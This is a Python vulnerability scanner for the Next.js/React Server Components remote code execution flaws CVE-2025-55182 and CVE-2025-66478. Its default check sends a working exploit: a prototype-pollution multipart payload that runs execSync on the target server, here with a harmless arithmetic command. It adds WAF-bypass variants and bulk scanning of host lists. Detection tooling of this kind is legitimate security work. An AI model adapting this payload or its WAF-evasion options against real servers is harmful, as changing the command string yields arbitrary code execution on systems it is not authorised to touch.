#!/usr/bin/env python3
"""
React2Shell Scanner - High Fidelity Detection for RSC/Next.js RCE
CVE-2025-55182 & CVE-2025-66478
Based on research from Assetnote Security Research Team.
"""
import argparse
import sys
import json
import os
import random
import re
import string
from datetime import datetime, timezone
from concurrent.futures import ThreadPoolExecutor, as_completed
from urllib.parse import urlparse
from typing import Optional
try:
import requests
from requests.exceptions import RequestException
except ImportError:
print("Error: 'requests' library required. Install with: pip install requests")
sys.exit(1)
try:
from tqdm import tqdm
except ImportError:
print("Error: 'tqdm' library required. Install with: pip install tqdm")
sys.exit(1)
class Colors:
    """ANSI escape sequences used to style terminal output.

    The values are plain class attributes so they can be reassigned at
    runtime; ``main()`` replaces every one with an empty string when colour
    output is disabled.
    """

    # Foreground colours (codes 91-97).
    RED = "\033[91m"
    GREEN = "\033[92m"
    YELLOW = "\033[93m"
    BLUE = "\033[94m"
    MAGENTA = "\033[95m"
    CYAN = "\033[96m"
    WHITE = "\033[97m"
    # Text attributes: bold on, and reset-everything.
    BOLD = "\033[1m"
    RESET = "\033[0m"
def colorize(text: str, color: str) -> str:
    """Return *text* prefixed with *color* and followed by the reset code."""
    return "{}{}{}".format(color, text, Colors.RESET)
def print_banner():
    """Write the attribution banner to stdout, padded by a blank line on each side."""
    tagline = f"{Colors.CYAN}{Colors.BOLD}brought to you by assetnote{Colors.RESET}"
    print(f"\n{tagline}\n")
def parse_headers(header_list: list[str] | None) -> dict[str, str]:
"""Parse a list of 'Key: Value' strings into a dict."""
headers = {}
if not header_list:
return headers
for header in header_list:
if ": " in header:
key, value = header.split(": ", 1)
headers[key] = value
elif ":" in header:
key, value = header.split(":", 1)
headers[key] = value.lstrip()
return headers
def normalize_host(host: str) -> str:
    """Normalize a host string into a URL without a trailing slash.

    Surrounding whitespace is removed. If the value already starts with an
    ``http://`` or ``https://`` scheme (matched case-insensitively) the scheme
    is kept and lower-cased; otherwise ``https://`` is prepended. Trailing
    slashes are stripped from the result.

    Args:
        host: Host name or URL as supplied by the user.

    Returns:
        The normalized URL, or ``""`` when *host* is empty or whitespace only.
    """
    host = host.strip()
    if not host:
        return ""
    scheme, separator, remainder = host.partition("://")
    if separator and scheme.lower() in ("http", "https"):
        # URL schemes are case-insensitive; "HTTPS://x" must not be treated
        # as scheme-less and end up as "https://HTTPS://x".
        host = f"{scheme.lower()}://{remainder}"
    else:
        host = f"https://{host}"
    return host.rstrip("/")
def generate_junk_data(size_bytes: int) -> tuple[str, str]:
    """Return a random form-field name and a random filler value.

    The name is 12 lowercase ASCII letters; the filler is *size_bytes*
    characters drawn from ASCII letters and digits.
    """
    name_alphabet = string.ascii_lowercase
    filler_alphabet = string.ascii_letters + string.digits
    field_name = "".join(random.choices(name_alphabet, k=12))
    filler = "".join(random.choices(filler_alphabet, k=size_bytes))
    return field_name, filler
def build_safe_payload() -> tuple[str, str]:
    """Build the multipart body used by the safe (side-channel) check.

    The body has two form parts: ``"1"`` containing ``{}`` and ``"0"``
    containing ``["$1:aa:aa"]``. It carries no command string.

    Returns:
        A ``(body, content_type)`` tuple, where ``content_type`` is the
        ``multipart/form-data`` header value naming the boundary used in
        ``body``.
    """
    boundary = "----WebKitFormBoundaryx8jO2oVc6SWP3Sad"
    # Each delimiter line below is the boundary with the extra leading "--"
    # that multipart/form-data requires; the final one also ends in "--".
    body = (
        f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
        f'Content-Disposition: form-data; name="1"\r\n\r\n'
        f"{{}}\r\n"
        f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
        f'Content-Disposition: form-data; name="0"\r\n\r\n'
        f'["$1:aa:aa"]\r\n'
        f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad--"
    )
    content_type = f"multipart/form-data; boundary={boundary}"
    return body, content_type
def build_vercel_waf_bypass_payload() -> tuple[str, str]:
    """Build the Vercel WAF bypass variant of the multipart payload.

    The body has four form parts named ``"0"`` to ``"3"``. The embedded
    command is fixed to the Unix ``echo $((41*271))`` arithmetic check; this
    builder takes no options.

    Returns:
        A ``(body, content_type)`` tuple, where ``content_type`` is the
        ``multipart/form-data`` header value naming the boundary used in
        ``body``.
    """
    boundary = "----WebKitFormBoundaryx8jO2oVc6SWP3Sad"
    # JSON text for part "0". It is written as adjacent literals so the exact
    # escaping is visible; do not reformat.
    part0 = (
        '{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,'
        '"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":'
        '"var res=process.mainModule.require(\'child_process\').execSync(\'echo $((41*271))\').toString().trim();;'
        'throw Object.assign(new Error(\'NEXT_REDIRECT\'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});",'
        '"_chunks":"$Q2","_formData":{"get":"$3:\\"$$:constructor:constructor"}}}'
    )
    body = (
        f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
        f'Content-Disposition: form-data; name="0"\r\n\r\n'
        f"{part0}\r\n"
        f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
        f'Content-Disposition: form-data; name="1"\r\n\r\n'
        f'"$@0"\r\n'
        f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
        f'Content-Disposition: form-data; name="2"\r\n\r\n'
        f"[]\r\n"
        f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
        f'Content-Disposition: form-data; name="3"\r\n\r\n'
        # \u0024 is "$"; the part body is {"\"$$":{}}.
        f'{{"\\"\u0024\u0024":{{}}}}\r\n'
        f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad--"
    )
    content_type = f"multipart/form-data; boundary={boundary}"
    return body, content_type
def build_rce_payload(windows: bool = False, waf_bypass: bool = False, waf_bypass_size_kb: int = 128) -> tuple[str, str]:
    """Build the RCE PoC multipart form data payload.

    The embedded command only evaluates ``41*271`` (= 11111), which is the
    value ``is_vulnerable_rce_check`` looks for in the response.

    Args:
        windows: Use the PowerShell form of the arithmetic command instead of
            the Unix shell form.
        waf_bypass: Prepend an extra form part filled with random data.
        waf_bypass_size_kb: Size of that extra part in KiB (multiplied by
            1024 before generating the data). Ignored unless *waf_bypass*.

    Returns:
        A ``(body, content_type)`` tuple, where ``content_type`` is the
        ``multipart/form-data`` header value naming the boundary used in
        ``body``.
    """
    boundary = "----WebKitFormBoundaryx8jO2oVc6SWP3Sad"
    if windows:
        # PowerShell payload - escape double quotes for JSON
        cmd = 'powershell -c \\\"41*271\\\"'
    else:
        # Linux/Unix payload
        cmd = 'echo $((41*271))'
    # Doubled braces are f-string escapes; the emitted text has single braces.
    prefix_payload = (
        f"var res=process.mainModule.require('child_process').execSync('{cmd}')"
        f".toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),"
        f"{{digest: `NEXT_REDIRECT;push;/login?a=${{res}};307;`}});"
    )
    # JSON text for part "0", with prefix_payload spliced into "_prefix".
    part0 = (
        '{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,'
        '"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"'
        + prefix_payload
        + '","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}'
    )
    parts = []
    # Add junk data at the start if WAF bypass is enabled
    if waf_bypass:
        param_name, junk = generate_junk_data(waf_bypass_size_kb * 1024)
        parts.append(
            f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
            f'Content-Disposition: form-data; name="{param_name}"\r\n\r\n'
            f"{junk}\r\n"
        )
    parts.append(
        f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
        f'Content-Disposition: form-data; name="0"\r\n\r\n'
        f"{part0}\r\n"
    )
    parts.append(
        f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
        f'Content-Disposition: form-data; name="1"\r\n\r\n'
        f'"$@0"\r\n'
    )
    parts.append(
        f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
        f'Content-Disposition: form-data; name="2"\r\n\r\n'
        f"[]\r\n"
    )
    # Closing delimiter: boundary with leading and trailing "--".
    parts.append("------WebKitFormBoundaryx8jO2oVc6SWP3Sad--")
    body = "".join(parts)
    content_type = f"multipart/form-data; boundary={boundary}"
    return body, content_type
def resolve_redirects(url: str, timeout: int, verify_ssl: bool, max_redirects: int = 10) -> str:
    """Follow HTTP redirects from *url* for as long as they stay on the same host.

    Issues ``HEAD`` requests with automatic redirect handling disabled and
    resolves each ``Location`` header against the current URL, so absolute,
    root-relative (``/x``), path-relative (``x``) and protocol-relative
    (``//host/x``) targets are all interpreted the way an HTTP client would.

    Args:
        url: Starting URL.
        timeout: Per-request timeout in seconds.
        verify_ssl: Whether to verify TLS certificates.
        max_redirects: Maximum number of redirect hops to follow.

    Returns:
        The last URL reached on the original host. This is *url* itself when
        there is no redirect, the redirect leaves the host, or a request fails.
    """
    # Local import: the module-level import only brings in urlparse.
    from urllib.parse import urljoin

    current_url = url
    # Host names are case-insensitive, so compare them lower-cased.
    original_host = urlparse(url).netloc.lower()
    for _ in range(max_redirects):
        try:
            response = requests.head(
                current_url,
                timeout=timeout,
                verify=verify_ssl,
                allow_redirects=False,
            )
        except RequestException:
            break
        if response.status_code not in (301, 302, 303, 307, 308):
            break
        location = response.headers.get("Location")
        if not location:
            break
        next_url = urljoin(current_url, location)
        if urlparse(next_url).netloc.lower() != original_host:
            break  # Different host, stop following
        if next_url == current_url:
            break  # Self-redirect; further requests cannot change the answer
        current_url = next_url
    return current_url
def send_payload(target_url: str, headers: dict, body: str, timeout: int, verify_ssl: bool) -> tuple[requests.Response | None, str | None]:
    """POST *body* to *target_url* without following redirects.

    Returns:
        ``(response, None)`` on success, or ``(None, message)`` describing the
        failure. Exceptions are never propagated to the caller.
    """
    try:
        # Send bytes so Content-Length is computed from the encoded payload
        # rather than left to the HTTP client's handling of str bodies.
        if isinstance(body, str):
            wire_body = body.encode('utf-8')
        else:
            wire_body = body
        reply = requests.post(
            target_url,
            data=wire_body,
            headers=headers,
            verify=verify_ssl,
            timeout=timeout,
            allow_redirects=False,
        )
    # Handler order matters: SSLError is a ConnectionError subclass, and
    # everything here derives from RequestException.
    except requests.exceptions.SSLError as exc:
        return None, f"SSL Error: {exc}"
    except requests.exceptions.ConnectionError as exc:
        return None, f"Connection Error: {exc}"
    except requests.exceptions.Timeout:
        return None, "Request timed out"
    except RequestException as exc:
        return None, f"Request failed: {exc}"
    except Exception as exc:
        return None, f"Unexpected error: {exc}"
    else:
        return reply, None
def is_vulnerable_safe_check(response: requests.Response) -> bool:
    """Decide whether a safe-check response indicates a vulnerable target.

    A hit requires HTTP 500 with ``E{"digest"`` in the body, and is discarded
    when the response comes from Netlify or Vercel (identified by the
    ``Server`` header or a ``Netlify-Vary`` header).
    """
    matches_signature = response.status_code == 500 and 'E{"digest"' in response.text
    if not matches_signature:
        return False
    # Responses from these platforms are treated as mitigated, not as findings.
    server_name = response.headers.get("Server", "").lower()
    if "Netlify-Vary" in response.headers:
        return False
    return server_name not in ("netlify", "vercel")
def is_vulnerable_rce_check(response: requests.Response) -> bool:
    """Report whether the ``X-Action-Redirect`` header carries the PoC result.

    The payload's arithmetic (41*271) evaluates to 11111, so a redirect target
    containing ``/login?a=11111`` means the expression was executed.
    """
    redirect_target = response.headers.get("X-Action-Redirect", "")
    hit = re.search(r'.*/login\?a=11111.*', redirect_target)
    return hit is not None
def check_vulnerability(host: str, timeout: int = 10, verify_ssl: bool = True, follow_redirects: bool = True, custom_headers: dict[str, str] | None = None, safe_check: bool = False, windows: bool = False, waf_bypass: bool = False, waf_bypass_size_kb: int = 128, vercel_waf_bypass: bool = False) -> dict:
    """Check if a host is vulnerable to CVE-2025-55182/CVE-2025-66478.

    Tests the root path first. If that is not flagged and *follow_redirects*
    is set, resolves same-host redirects from the root and tests the final
    path as well.

    Args:
        host: Host name or URL; a missing scheme defaults to ``https://``.
        timeout: Per-request timeout in seconds.
        verify_ssl: Whether to verify TLS certificates.
        follow_redirects: Also test the same-host redirect target of ``/``.
        custom_headers: Extra headers; these override the built-in defaults.
        safe_check: Use the side-channel payload (takes precedence over the
            other payload options).
        windows: Use the PowerShell command in the RCE PoC payload.
        waf_bypass: Prepend random filler data to the RCE PoC payload.
        waf_bypass_size_kb: Size of that filler in KB.
        vercel_waf_bypass: Use the Vercel WAF bypass payload variant.

    Returns:
        A dict with:
        - host: the target host exactly as passed in
        - vulnerable: True/False/None (None if error)
        - status_code: HTTP status code of the last recorded response
        - error: error message if any
        - request: text rendering of the request that was sent
        - response: text rendering of the response (body truncated to 2000 chars)
        - final_url: the URL the recorded request/response belong to
        - timestamp: UTC time of the check, ISO-8601 with a "Z" suffix
    """
    result = {
        "host": host,
        "vulnerable": None,
        "status_code": None,
        "error": None,
        "request": None,
        "response": None,
        "final_url": None,
        # isoformat() on an aware UTC datetime already ends in "+00:00";
        # replace it with "Z" rather than appending a second designator.
        "timestamp": datetime.now(timezone.utc).isoformat().replace("+00:00", "Z"),
    }
    host = normalize_host(host)
    if not host:
        result["error"] = "Invalid or empty host"
        return result
    root_url = f"{host}/"

    # Pick the payload and the matching response classifier.
    if safe_check:
        body, content_type = build_safe_payload()
        is_vulnerable = is_vulnerable_safe_check
    elif vercel_waf_bypass:
        body, content_type = build_vercel_waf_bypass_payload()
        is_vulnerable = is_vulnerable_rce_check
    else:
        body, content_type = build_rce_payload(windows=windows, waf_bypass=waf_bypass, waf_bypass_size_kb=waf_bypass_size_kb)
        is_vulnerable = is_vulnerable_rce_check

    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0",
        "Next-Action": "x",
        "X-Nextjs-Request-Id": "b5dce965",
        "Content-Type": content_type,
        "X-Nextjs-Html-Request-Id": "SSTMXm7OJ_g0Ncx6jpQt9",
    }
    # Apply custom headers (override defaults)
    if custom_headers:
        headers.update(custom_headers)

    # The body goes on the wire UTF-8 encoded, so report its byte length.
    body_length = len(body.encode("utf-8"))

    def build_request_str(url: str) -> str:
        """Render the request sent to *url* as HTTP/1.1 text for the report."""
        parsed = urlparse(url)
        # Log the path that was actually requested, not a placeholder.
        request_target = parsed.path or "/"
        if parsed.query:
            request_target = f"{request_target}?{parsed.query}"
        lines = [f"POST {request_target} HTTP/1.1", f"Host: {parsed.netloc}"]
        lines.extend(f"{k}: {v}" for k, v in headers.items())
        lines.append(f"Content-Length: {body_length}")
        return "\r\n".join(lines) + "\r\n\r\n" + body

    def build_response_str(resp: requests.Response) -> str:
        """Render *resp* as HTTP/1.1 text, keeping at most 2000 body chars."""
        lines = [f"HTTP/1.1 {resp.status_code} {resp.reason}"]
        lines.extend(f"{k}: {v}" for k, v in resp.headers.items())
        return "\r\n".join(lines) + "\r\n\r\n" + resp.text[:2000]

    # First, test the root path
    result["final_url"] = root_url
    result["request"] = build_request_str(root_url)
    response, error = send_payload(root_url, headers, body, timeout, verify_ssl)
    if error:
        result["error"] = error
        return result
    result["status_code"] = response.status_code
    result["response"] = build_response_str(response)
    if is_vulnerable(response):
        result["vulnerable"] = True
        return result

    # Root not vulnerable - try redirect path if enabled
    if follow_redirects:
        try:
            redirect_url = resolve_redirects(root_url, timeout, verify_ssl)
            if redirect_url != root_url:
                redirect_response, redirect_error = send_payload(redirect_url, headers, body, timeout, verify_ssl)
                # On a failed redirect request the root result is kept as-is.
                if not redirect_error:
                    result.update(
                        {
                            "final_url": redirect_url,
                            "request": build_request_str(redirect_url),
                            "status_code": redirect_response.status_code,
                            "response": build_response_str(redirect_response),
                        }
                    )
                    if is_vulnerable(redirect_response):
                        result["vulnerable"] = True
                        return result
        except Exception:
            # Deliberate best effort: the redirect probe is optional, so any
            # failure here falls back to the root result recorded above.
            pass

    result["vulnerable"] = False
    return result
def load_hosts(hosts_file: str) -> list[str]:
    """Read target hosts from *hosts_file*, one per line.

    Lines are stripped of surrounding whitespace; blank lines and lines
    starting with ``#`` are skipped. If the file is missing or unreadable an
    error is printed and the process exits with status 1.
    """
    try:
        with open(hosts_file, "r") as handle:
            stripped_lines = (raw.strip() for raw in handle)
            return [entry for entry in stripped_lines if entry and not entry.startswith("#")]
    except FileNotFoundError:
        print(colorize(f"[ERROR] File not found: {hosts_file}", Colors.RED))
        sys.exit(1)
    except Exception as exc:
        print(colorize(f"[ERROR] Failed to read file: {exc}", Colors.RED))
        sys.exit(1)
def save_results(results: list[dict], output_file: str, vulnerable_only: bool = True):
    """Write scan results to *output_file* as indented JSON.

    The document contains ``scan_time`` (UTC, ISO-8601 with a "Z" suffix),
    ``total_results`` and ``results``. A failure to write is reported on
    stdout and does not raise.

    Args:
        results: Result dicts to save.
        output_file: Destination path; overwritten if it exists.
        vulnerable_only: Keep only results whose ``vulnerable`` is ``True``.
    """
    if vulnerable_only:
        results = [r for r in results if r.get("vulnerable") is True]
    output = {
        # isoformat() on an aware UTC datetime already ends in "+00:00";
        # replace it with "Z" rather than appending a second designator.
        "scan_time": datetime.now(timezone.utc).isoformat().replace("+00:00", "Z"),
        "total_results": len(results),
        "results": results,
    }
    try:
        with open(output_file, "w") as f:
            json.dump(output, f, indent=2)
        print(colorize(f"\n[+] Results saved to: {output_file}", Colors.GREEN))
    except Exception as e:
        print(colorize(f"\n[ERROR] Failed to save results: {e}", Colors.RED))
def print_result(result: dict, verbose: bool = False):
    """Print a one-line verdict for a single scan result.

    Vulnerable hosts always show their redirect target (if any); other hosts
    show it only in verbose mode. In verbose mode the first ten lines of the
    recorded response are printed for vulnerable hosts.

    Args:
        result: A result dict with at least ``host``, ``vulnerable`` and
            ``status_code``.
        verbose: Print the extra detail described above.
    """
    host = result["host"]
    final_url = result.get("final_url")
    # True when the recorded URL is not simply the normalized host's root.
    redirected = bool(final_url) and final_url != f"{normalize_host(host)}/"
    verdict = result["vulnerable"]

    if verdict is True:
        status = colorize("[VULNERABLE]", Colors.RED + Colors.BOLD)
        print(f"{status} {colorize(host, Colors.WHITE)} - Status: {result['status_code']}")
        if redirected:
            print(f" -> Redirected to: {final_url}")
    elif verdict is False:
        status = colorize("[NOT VULNERABLE]", Colors.GREEN)
        print(f"{status} {host} - Status: {result['status_code']}")
        if redirected and verbose:
            print(f" -> Redirected to: {final_url}")
    else:
        status = colorize("[ERROR]", Colors.YELLOW)
        # The "error" key can be present with a None value, in which case a
        # .get() default would never apply; fall back explicitly.
        error_msg = result.get("error") or "Unknown error"
        print(f"{status} {host} - {error_msg}")

    if verbose and verdict:
        print(colorize(" Response snippet:", Colors.CYAN))
        if result.get("response"):
            for line in result["response"].split("\r\n")[:10]:
                print(f" {line}")
def _build_arg_parser() -> argparse.ArgumentParser:
    """Create the command-line parser for the scanner."""
    parser = argparse.ArgumentParser(
        description="React2Shell Scanner",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
%(prog)s -u https://example.com
%(prog)s -l hosts.txt -t 20 -o results.json
%(prog)s -l hosts.txt --threads 50 --timeout 15
%(prog)s -u https://example.com -H "Authorization: Bearer token" -H "User-Agent: CustomAgent"
"""
    )
    input_group = parser.add_mutually_exclusive_group(required=True)
    input_group.add_argument(
        "-u", "--url",
        help="Single URL/host to check"
    )
    input_group.add_argument(
        "-l", "--list",
        help="File containing list of hosts (one per line)"
    )
    parser.add_argument(
        "-t", "--threads",
        type=int,
        default=10,
        help="Number of concurrent threads (default: 10)"
    )
    parser.add_argument(
        "--timeout",
        type=int,
        default=10,
        help="Request timeout in seconds (default: 10)"
    )
    parser.add_argument(
        "-o", "--output",
        help="Output file for results (JSON format)"
    )
    parser.add_argument(
        "--all-results",
        action="store_true",
        help="Save all results to output file, not just vulnerable hosts"
    )
    # Verification has always been off by default (default=True here), which
    # made -k a no-op with no way to turn verification on. The default is
    # kept for compatibility and --verify-ssl provides the missing switch.
    parser.add_argument(
        "-k", "--insecure",
        default=True,
        action="store_true",
        help="Disable SSL certificate verification (default)"
    )
    parser.add_argument(
        "--verify-ssl",
        dest="insecure",
        default=True,
        action="store_false",
        help="Enable SSL certificate verification"
    )
    parser.add_argument(
        "-H", "--header",
        action="append",
        dest="headers",
        metavar="HEADER",
        help="Custom header in 'Key: Value' format (can be used multiple times)"
    )
    parser.add_argument(
        "-v", "--verbose",
        action="store_true",
        help="Verbose output (show response snippets for vulnerable hosts)"
    )
    parser.add_argument(
        "-q", "--quiet",
        action="store_true",
        help="Quiet mode (only show vulnerable hosts)"
    )
    parser.add_argument(
        "--no-color",
        action="store_true",
        help="Disable colored output"
    )
    parser.add_argument(
        "--safe-check",
        action="store_true",
        help="Use safe side-channel detection instead of RCE PoC"
    )
    parser.add_argument(
        "--windows",
        action="store_true",
        help="Use Windows PowerShell payload instead of Unix shell"
    )
    parser.add_argument(
        "--waf-bypass",
        action="store_true",
        help="Add junk data to bypass WAF content inspection (default: 128KB)"
    )
    parser.add_argument(
        "--waf-bypass-size",
        type=int,
        default=128,
        metavar="KB",
        help="Size of junk data in KB for WAF bypass (default: 128)"
    )
    parser.add_argument(
        "--vercel-waf-bypass",
        action="store_true",
        help="Use Vercel WAF bypass payload variant"
    )
    return parser


def main():
    """Command-line entry point: parse options, scan the hosts, report.

    Exits with status 1 when at least one host is reported vulnerable (or the
    host list is empty), 0 otherwise. Invalid option values are rejected by
    the argument parser.
    """
    parser = _build_arg_parser()
    args = parser.parse_args()

    # Reject values that would otherwise fail later: ThreadPoolExecutor raises
    # on max_workers < 1, and a non-positive timeout makes every request fail.
    if args.threads < 1:
        parser.error("--threads must be at least 1")
    if args.timeout < 1:
        parser.error("--timeout must be at least 1")

    if args.no_color or not sys.stdout.isatty():
        for attr in ("RED", "GREEN", "YELLOW", "BLUE", "MAGENTA", "CYAN", "WHITE", "BOLD", "RESET"):
            setattr(Colors, attr, "")

    if not args.quiet:
        print_banner()

    if args.url:
        hosts = [args.url]
    else:
        hosts = load_hosts(args.list)
    if not hosts:
        print(colorize("[ERROR] No hosts to scan", Colors.RED))
        sys.exit(1)

    # Adjust timeout for WAF bypass mode
    timeout = args.timeout
    if args.waf_bypass and args.timeout == 10:
        timeout = 20

    if not args.quiet:
        print(colorize(f"[*] Loaded {len(hosts)} host(s) to scan", Colors.CYAN))
        print(colorize(f"[*] Using {args.threads} thread(s)", Colors.CYAN))
        print(colorize(f"[*] Timeout: {timeout}s", Colors.CYAN))
        if args.safe_check:
            print(colorize("[*] Using safe side-channel check", Colors.CYAN))
        else:
            print(colorize("[*] Using RCE PoC check", Colors.CYAN))
        if args.windows:
            print(colorize("[*] Windows mode enabled (PowerShell payload)", Colors.CYAN))
        if args.waf_bypass:
            print(colorize(f"[*] WAF bypass enabled ({args.waf_bypass_size}KB junk data)", Colors.CYAN))
        if args.vercel_waf_bypass:
            print(colorize("[*] Vercel WAF bypass mode enabled", Colors.CYAN))
        if args.insecure:
            print(colorize("[!] SSL verification disabled", Colors.YELLOW))
        print()

    results = []
    vulnerable_count = 0
    error_count = 0
    verify_ssl = not args.insecure
    if args.insecure:
        import urllib3
        urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

    # Options shared by every check_vulnerability() call.
    scan_options = {
        "custom_headers": parse_headers(args.headers),
        "safe_check": args.safe_check,
        "windows": args.windows,
        "waf_bypass": args.waf_bypass,
        "waf_bypass_size_kb": args.waf_bypass_size,
        "vercel_waf_bypass": args.vercel_waf_bypass,
    }

    if len(hosts) == 1:
        result = check_vulnerability(hosts[0], timeout, verify_ssl, **scan_options)
        results.append(result)
        if not args.quiet or result["vulnerable"]:
            print_result(result, args.verbose)
        if result["vulnerable"]:
            vulnerable_count = 1
        elif result["error"]:
            # Count the failure so the summary does not list it as "not vulnerable".
            error_count = 1
    else:
        with ThreadPoolExecutor(max_workers=args.threads) as executor:
            futures = {
                executor.submit(check_vulnerability, host, timeout, verify_ssl, **scan_options): host
                for host in hosts
            }
            with tqdm(
                total=len(hosts),
                desc=colorize("Scanning", Colors.CYAN),
                unit="host",
                ncols=80,
                disable=args.quiet
            ) as pbar:
                for future in as_completed(futures):
                    try:
                        result = future.result()
                    except Exception as exc:
                        # One malformed target must not abort the whole scan
                        # and lose the results gathered so far.
                        result = {
                            "host": futures[future],
                            "vulnerable": None,
                            "status_code": None,
                            "error": f"Unexpected error: {exc}",
                            "request": None,
                            "response": None,
                            "final_url": None,
                            "timestamp": datetime.now(timezone.utc).isoformat().replace("+00:00", "Z"),
                        }
                    results.append(result)
                    if result["vulnerable"]:
                        vulnerable_count += 1
                        show = True
                    else:
                        if result["error"]:
                            error_count += 1
                        show = args.verbose and not args.quiet
                    if show:
                        tqdm.write("")
                        print_result(result, args.verbose)
                    pbar.update(1)

    if not args.quiet:
        print()
        print(colorize("=" * 60, Colors.CYAN))
        print(colorize("SCAN SUMMARY", Colors.BOLD))
        print(colorize("=" * 60, Colors.CYAN))
        print(f" Total hosts scanned: {len(hosts)}")
        if vulnerable_count > 0:
            print(f" {colorize(f'Vulnerable: {vulnerable_count}', Colors.RED + Colors.BOLD)}")
        else:
            print(f" Vulnerable: {vulnerable_count}")
        print(f" Not vulnerable: {len(hosts) - vulnerable_count - error_count}")
        print(f" Errors: {error_count}")
        print(colorize("=" * 60, Colors.CYAN))

    if args.output:
        save_results(results, args.output, vulnerable_only=not args.all_results)

    # Non-zero exit status signals that at least one host was flagged.
    sys.exit(1 if vulnerable_count > 0 else 0)
# Run the scanner only when this file is executed as a script, not on import.
if __name__ == "__main__":
    main()